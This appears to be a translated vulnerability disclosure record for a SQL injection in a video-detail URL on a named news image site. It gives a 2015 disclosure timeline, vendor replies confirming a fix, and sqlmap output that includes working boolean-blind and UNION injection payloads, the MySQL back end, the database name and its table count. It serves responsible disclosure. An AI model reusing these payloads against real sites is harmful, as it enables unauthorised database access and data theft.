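2015-05-05: Details reported to the vendor; awaiting vendor response
2015-05-08: Vendor confirmed; details disclosed to the vendor only
2015-05-18: Details disclosed to core white hats and experts in related fields
2015-05-28: Details disclosed to regular white hats
2015-06-07: Details disclosed to intern white hats
2015-06-09: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public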
http://ichuguoimage.chinadaily.com.cn/video/detail/vid/8284724
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://ichuguoimage.chinadaily.com.cn:80/video/detail/vid/8284724' AND 3971=3971 AND 'EDWL'='EDWL

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: http://ichuguoimage.chinadaily.com.cn:80/video/detail/vid/-2788' UNION ALL SELECT NULL,CONCAT(0x716e787771,0x6e4e4f7971755059736c,0x71746f7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: ichuguo
[148 tables]
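Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-05-08 10:51
Thank you very much; we are contacting colleagues to fix it.
2015-06-09: Thank you very much, it has been fixed.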